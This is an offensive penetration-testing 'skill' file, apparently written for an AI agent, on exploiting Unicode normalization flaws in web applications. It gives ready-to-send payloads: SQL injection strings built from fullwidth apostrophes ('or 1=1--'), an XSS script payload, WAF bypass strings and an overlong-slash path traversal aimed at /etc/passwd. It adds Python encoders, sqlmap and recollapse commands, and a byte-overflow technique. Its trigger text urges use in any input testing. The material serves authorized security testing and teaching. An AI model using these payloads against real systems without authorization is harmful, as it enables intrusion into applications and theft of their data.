Hacktricks-skills unicode-normalization-pentest

How to identify and exploit Unicode normalization vulnerabilities in web applications. Use this skill whenever you're testing for SQL injection bypass, XSS, WAF evasion, or input validation issues that might be affected by Unicode normalization. Trigger this when you see reflected input, need to bypass character filters, or want to test for normalization-based security flaws. Don't forget to use this for any input validation testing, especially when the application echoes user input or uses regex-based filtering.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/unicode-injection/unicode-normalization/SKILL.MD

Unicode Normalization Pentesting

This skill helps you identify and exploit Unicode normalization vulnerabilities in web applications. These vulnerabilities arise when an application normalizes Unicode input after a security check has already run, so characters the filter accepted are converted into characters it would have blocked.

Quick Detection Test

Start with the Kelvin Sign test to detect if normalization is happening:

  1. Send KELVIN SIGN (U+212A), encoded as %e2%84%aa, to any input field
  2. If the application echoes back a plain K, Unicode normalization is being performed
  3. A positive result means normalization-based bypasses are worth testing
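
The probe can be reproduced offline with Python's standard library. This is a minimal sketch; the variable names are illustrative and not part of the original skill.

```python
import unicodedata
from urllib.parse import quote

KELVIN_SIGN = "\u212a"  # KELVIN SIGN

# Percent-encoded UTF-8 form to paste into a parameter value.
probe = quote(KELVIN_SIGN).lower()

# KELVIN SIGN has a canonical mapping to "K", so all four forms fold it.
folded = {
    form: unicodedata.normalize(form, KELVIN_SIGN)
    for form in ("NFC", "NFD", "NFKC", "NFKD")
}

print(probe)
print(folded)
```

Because every form folds this character, a plain K in the response confirms that normalization happens but does not say which form is in use.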

Understanding the Vulnerability

How It Works

Applications may normalize Unicode input at different processing stages:

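  • Before filtering: Normalization happens first, then security filters run on the normalized text (the safe order)
  • After filtering: Filters run on the raw input, then normalization turns look-alike characters into the ones the filter was meant to block (the exploitable order)
  • Inconsistent normalization: Different parts of the app apply different forms, so a value can pass one check and mean something else downstream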
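
The difference between the two orderings can be sketched as follows. The blocklist and function names are hypothetical stand-ins for whatever filter the target uses, and NFKC is assumed as the backend's form.

```python
import unicodedata

BLOCKED = {"'", '"', "<", ">"}  # hypothetical blocklist


def is_clean(value: str) -> bool:
    """Reject values that contain any blocked ASCII character."""
    return not any(ch in BLOCKED for ch in value)


def filter_then_normalize(value: str) -> str:
    """Exploitable order: the filter sees raw input, the backend sees the folded form."""
    if not is_clean(value):
        raise ValueError("blocked")
    return unicodedata.normalize("NFKC", value)


def normalize_then_filter(value: str) -> str:
    """Safer order: the filter sees exactly what the backend will use."""
    folded = unicodedata.normalize("NFKC", value)
    if not is_clean(folded):
        raise ValueError("blocked")
    return folded


payload = "\uff07 or 1=1-- "  # starts with FULLWIDTH APOSTROPHE (U+FF07)
print(repr(filter_then_normalize(payload)))
```

With the first ordering the fullwidth apostrophe passes the filter and reaches the backend as an ASCII quote; with the second ordering the same input is rejected.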

The Four Normalization Forms

Form  Description                  Use Case
NFC   Canonical composition        Most common default
NFD   Canonical decomposition      Breaks characters into base + combining
NFKC  Compatibility composition    Converts compatibility characters
NFKD  Compatibility decomposition  Full compatibility breakdown
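
To see how the four forms differ in practice, the sketch below runs three sample characters through each one. The samples are chosen here for illustration; they are not from the original skill.

```python
import unicodedata

FORMS = ("NFC", "NFD", "NFKC", "NFKD")

SAMPLES = {
    "e with acute": "\u00e9",          # canonical decomposition: e + U+0301
    "fullwidth apostrophe": "\uff07",  # compatibility mapping to '
    "not less-than": "\u226e",         # canonical decomposition: < + U+0338
}


def codepoints(text: str) -> str:
    """Render a string as space-separated U+XXXX code points."""
    return " ".join(f"U+{ord(ch):04X}" for ch in text)


def normalize_all(text: str) -> dict[str, str]:
    """Apply each of the four forms to the same input."""
    return {form: unicodedata.normalize(form, text) for form in FORMS}


for label, ch in SAMPLES.items():
    for form, out in normalize_all(ch).items():
        print(f"{label:22} {form:5} {codepoints(out)}")
```

The output makes the practical rule visible: fullwidth and other compatibility look-alikes only fold under NFKC or NFKD, while characters with a canonical decomposition split under NFD or NFKD.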

Attack Vectors

1. SQL Injection Filter Bypass

When applications filter dangerous characters but normalize afterward:

Target: Single quote ' (0x27)

  • Unicode equivalent: %ef%bc%87 (U+FF07 FULLWIDTH APOSTROPHE)

Payloads:

# Single quote injection
%ef%bc%87+or+1=1--+

# With Unicode equivalents for all characters
%ef%bc%87+%e1%b4%bc%e1%b4%bf+%c2%b9%e2%81%bc%c2%b9%ef%b9%a3%ef%b9%a3+%ef%b9%a3

# Double quote variant
%ef%bc%82+or+1=1--+

# OR operator bypass
%ef%bc%87+%ef%bd%9c%ef%bd%9c+%c2%b9%e2%81%bc%e2%81%bc%c2%b9%ef%bc%8f%ef%bc%8f

Key Unicode Mappings (all are compatibility mappings, so they fold only under NFKC or NFKD):

'  → %ef%bc%87  (FULLWIDTH APOSTROPHE)
"  → %ef%bc%82  (FULLWIDTH QUOTATION MARK)
|  → %ef%bd%9c  (FULLWIDTH VERTICAL LINE)
/  → %ef%bc%8f  (FULLWIDTH SOLIDUS)
-  → %ef%b9%a3  (SMALL HYPHEN-MINUS)
=  → %e2%81%bc  (SUPERSCRIPT EQUALS SIGN)
1  → %c2%b9     (SUPERSCRIPT ONE)
#  → %ef%b9%9f  (SMALL NUMBER SIGN)
*  → %ef%b9%a1  (SMALL ASTERISK)
O  → %e1%b4%bc  (MODIFIER LETTER CAPITAL O)
R  → %e1%b4%bf  (MODIFIER LETTER CAPITAL R)
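
A small encoder built from these mappings might look like the sketch below. The helper names are hypothetical, and the table is copied from the list above; the result is checked by normalizing it back with NFKC.

```python
import re
import unicodedata
from urllib.parse import quote

# ASCII character -> look-alike that NFKC/NFKD folds back to it.
LOOKALIKES = {
    "'": "\uff07", '"': "\uff02", "|": "\uff5c", "/": "\uff0f",
    "-": "\ufe63", "=": "\u207c", "1": "\u00b9", "#": "\ufe5f",
    "*": "\ufe61", "O": "\u1d3c", "R": "\u1d3f",
}


def to_lookalikes(payload: str) -> str:
    """Swap each mapped ASCII character for its look-alike; leave the rest alone."""
    return "".join(LOOKALIKES.get(ch, ch) for ch in payload)


def url_encode(value: str) -> str:
    """Percent-encode as UTF-8 with lowercase hex, using + for spaces."""
    encoded = quote(value, safe="").replace("%20", "+")
    return re.sub(r"%[0-9A-F]{2}", lambda m: m.group(0).lower(), encoded)


raw = to_lookalikes("' OR 1=1-- -")
encoded = url_encode(raw)

print(encoded)
print(unicodedata.normalize("NFKC", raw))  # what an NFKC backend would see
```

Checking the round trip before sending anything avoids wasting requests on look-alikes that do not fold the way the table suggests.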

2. XSS Bypass

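Use Unicode characters that normalize to script-breaking characters. For example, %e2%89%ae is U+226E NOT LESS-THAN, which NFD and NFKD decompose into < followed by U+0338 COMBINING LONG SOLIDUS OVERLAY: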

Example payloads:

<script>alert(1)</script>
%e2%89%ae%3Cscript%3Ealert(1)%3C/script%3E
%u226e%3Cscript%3Ealert(1)%3C/script%3E
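
The following sketch shows where the angle bracket comes from. U+226E is the character used in the payloads above; the fullwidth brackets (U+FF1C, U+FF1E) are an additional illustration that does not appear in the original payload list.

```python
import unicodedata

NOT_LESS_THAN = "\u226e"   # sent as %e2%89%ae
FULLWIDTH_LT = "\uff1c"    # FULLWIDTH LESS-THAN SIGN (illustrative addition)
FULLWIDTH_GT = "\uff1e"    # FULLWIDTH GREATER-THAN SIGN (illustrative addition)

# Canonical decomposition: "<" followed by COMBINING LONG SOLIDUS OVERLAY.
decomposed = unicodedata.normalize("NFD", NOT_LESS_THAN)

# Compatibility folding: fullwidth brackets become ASCII brackets.
folded_tag = unicodedata.normalize("NFKC", FULLWIDTH_LT + "script" + FULLWIDTH_GT)

print([f"U+{ord(ch):04X}" for ch in decomposed])
print(folded_tag)
```

Which variant is useful depends on the form the target applies: the decomposition route needs NFD or NFKD, the fullwidth route needs NFKC or NFKD.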

Special K Polyglot:

%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83
# Normalizes (NFKC/NFKD) to: Leonishan
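
The string above can be decoded and checked locally. A minimal sketch, assuming the backend applies NFKC:

```python
import unicodedata
from urllib.parse import unquote

encoded = (
    "%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88"
    "%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83"
)

decoded = unquote(encoded)  # nine styled mathematical letters
normalized = unicodedata.normalize("NFKC", decoded)

# List the styled letters by name, then show the folded result.
for ch in decoded:
    print(f"U+{ord(ch):05X} {unicodedata.name(ch)}")
print(normalized)
```

None of the nine characters is ASCII, so a filter that matches on the literal name never sees it, yet the normalized value is plain text.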

3. Regex Fuzzing

When a regex validates a normalized copy of the input but the application then uses the raw value, the check and the use disagree about what was submitted:

Use the recollapse tool:

# Generate variations of input to fuzz backend
pip install recollapse
recollapse "https://example.com/path"

Test for:

  • Open Redirect vulnerabilities
  • SSRF through URL validation bypass
  • Path traversal through normalized characters
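
One way to build candidate characters for this kind of fuzzing is to brute-force which code points fold to a character the validator cares about. The sketch below is not how recollapse works internally; it is a standalone illustration using only the standard library, limited to the Basic Multilingual Plane to keep it fast.

```python
import unicodedata


def folds_to(target: str, form: str = "NFKC") -> list[str]:
    """Return BMP code points, other than target itself, that normalize to target."""
    hits = []
    for cp in range(0x80, 0x10000):
        if 0xD800 <= cp <= 0xDFFF:  # skip surrogates
            continue
        ch = chr(cp)
        if unicodedata.normalize(form, ch) == target:
            hits.append(ch)
    return hits


for target in ("/", "."):
    for ch in folds_to(target):
        print(repr(target), f"U+{ord(ch):04X}", unicodedata.name(ch, "?"))
```

Substituting these candidates for separators in a URL or path is a quick way to check whether the validator and the consumer agree on what the value means.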

4. Unicode Overflow

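Exploit byte overflow to create unexpected ASCII characters. If a vulnerable backend truncates each code point to a single byte, only the low 8 bits survive.

Example: Code points that overflow to A (0x41):

  • 0x4e41 → A
  • 0x4f41 → A
  • 0x5041 → A
  • 0x5141 → A

Technique: Send a character whose code point has your target character's value as its low byte (code point mod 256).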
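
The arithmetic behind the example is a simple mask. The sketch below models a hypothetical backend that keeps only the low byte of each code point; the function names are illustrative.

```python
def truncate_to_byte(code_point: int) -> int:
    """Model a backend that keeps only the low 8 bits of a code point."""
    return code_point & 0xFF


def overflow_candidates(target: str, start: int = 0x100, stop: int = 0x10000) -> list[int]:
    """Code points in [start, stop) whose low byte equals the target character."""
    low = ord(target)
    return [
        cp for cp in range(start, stop)
        if cp & 0xFF == low and not 0xD800 <= cp <= 0xDFFF  # skip surrogates
    ]


examples = [0x4E41, 0x4F41, 0x5041, 0x5141]
for cp in examples:
    print(hex(cp), "->", chr(truncate_to_byte(cp)))

print(len(overflow_candidates("A")), "BMP candidates for 'A'")
```

Any code point ending in 0x41 works equally well under this model, so candidates can be picked to avoid characters the target already filters.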

Testing Workflow

Step 1: Reconnaissance

  1. Identify reflected parameters: Find input fields that echo back to output
  2. Test Kelvin Sign: Send %e2%84%aa and check for K in the response
  3. Check normalization behavior: Compare responses with different Unicode forms
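
Comparing how a few probes come back can narrow down which form the target applies. The sketch below is a heuristic under stated assumptions: the probe set and function names are hypothetical, the target is simulated locally instead of contacted over HTTP, and a real application may apply other transformations (case folding, HTML encoding) that blur the result.

```python
import unicodedata

PROBES = {
    "kelvin": "\u212a",                # folds under all four forms
    "fullwidth_apostrophe": "\uff07",  # folds only under NFKC/NFKD
    "e_acute": "\u00e9",               # splits only under NFD/NFKD
}


def guess_form(echoes: dict[str, str]) -> str:
    """Infer the normalization form from how each probe was echoed back."""
    changed = {name: echoes[name] != PROBES[name] for name in PROBES}
    if not changed["kelvin"]:
        return "none observed"
    key = (changed["fullwidth_apostrophe"], changed["e_acute"])
    return {
        (False, False): "NFC",
        (False, True): "NFD",
        (True, False): "NFKC",
        (True, True): "NFKD",
    }[key]


def simulated_echo(form: str) -> dict[str, str]:
    """Stand-in for the target: normalizes every probe with one form."""
    return {name: unicodedata.normalize(form, p) for name, p in PROBES.items()}


for form in ("NFC", "NFD", "NFKC", "NFKD"):
    print(form, "->", guess_form(simulated_echo(form)))
```

In a real test, the `echoes` dictionary would be filled from the reflected values in the responses, ideally with each probe wrapped in a unique marker so it can be located reliably.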

Step 2: Filter Analysis

  1. Identify blocked characters: Test common dangerous characters (', ", <, >, etc.)
  2. Test Unicode equivalents: Replace blocked chars with Unicode variants
  3. Check normalization timing: Determine if normalization happens before or after filtering

Step 3: Exploitation

  1. Craft payloads: Use Unicode equivalents for your attack vectors
  2. Test with sqlmap: Use the sqlmap Unicode template (see Tools and Resources) for automated testing
  3. Manual verification: Confirm the vulnerability works as expected

Step 4: Verification

  1. Confirm bypass: Verify the attack succeeds through normalization
  2. Document findings: Record which Unicode forms work
  3. Test edge cases: Try different normalization forms (NFC, NFD, NFKC, NFKD)

Tools and Resources

sqlmap Unicode Template

# Clone the template
git clone https://github.com/carlospolop/sqlmap_to_unicode_template

# Use with sqlmap
python sqlmap_to_unicode.py -u "http://target.com/page?id=1"

recollapse

# Generate input variations
pip install recollapse
recollapse "input_string"

Reference Tables

Common Scenarios

WAF Bypass

When WAF filters specific characters but normalizes afterward:

# Original blocked payload
' OR 1=1-- -

# Unicode bypass
%ef%bc%87+%e1%b4%bc%e1%b4%bf+%c2%b9%e2%81%bc%c2%b9%ef%b9%a3%ef%b9%a3+%ef%b9%a3

Input Validation Bypass

When validation checks for specific patterns but normalizes before use:

# Blocked: <script>
# Bypass: %e2%89%ae%3Cscript%3E

Path Traversal

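When path validation looks for a literal / but a lenient decoder accepts %c0%af, the overlong UTF-8 encoding of /. This is a decoding flaw rather than a normalization flaw, but it is tested the same way:

# Normal: ../../../etc/passwd
# Overlong: ..%c0%af..%c0%af..%c0%afetc%c0%afpasswd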
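
The %c0%af sequence is the overlong two-byte encoding of /, which strict UTF-8 decoders reject. The sketch below contrasts Python's strict decoder with a hypothetical lenient one that skips the overlong check; the lenient function is written here only to illustrate the flaw.

```python
from typing import Optional

OVERLONG_SLASH = bytes([0xC0, 0xAF])  # %c0%af


def strict_decode(data: bytes) -> Optional[str]:
    """Decode with Python's UTF-8 codec, which rejects overlong forms."""
    try:
        return data.decode("utf-8")
    except UnicodeDecodeError:
        return None


def lenient_two_byte_decode(data: bytes) -> str:
    """Hypothetical buggy decoder: combines a 2-byte sequence without an overlong check."""
    lead, continuation = data
    return chr(((lead & 0x1F) << 6) | (continuation & 0x3F))


print(strict_decode(OVERLONG_SLASH))            # rejected by a strict decoder
print(lenient_two_byte_decode(OVERLONG_SLASH))  # accepted as "/" by the buggy one
```

The payload only works against targets whose decoder behaves like the second function, so a rejected or garbled response usually means the decoder is strict.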

Best Practices

  1. Always test normalization: Include Unicode tests in your standard pentest workflow
  2. Document normalization behavior: Record which forms the application uses
  3. Test all input vectors: Forms, URLs, headers, cookies, JSON bodies
  4. Consider encoding layers: URL encoding + Unicode encoding combinations
  5. Check for inconsistent normalization: Different parts of the app may normalize differently
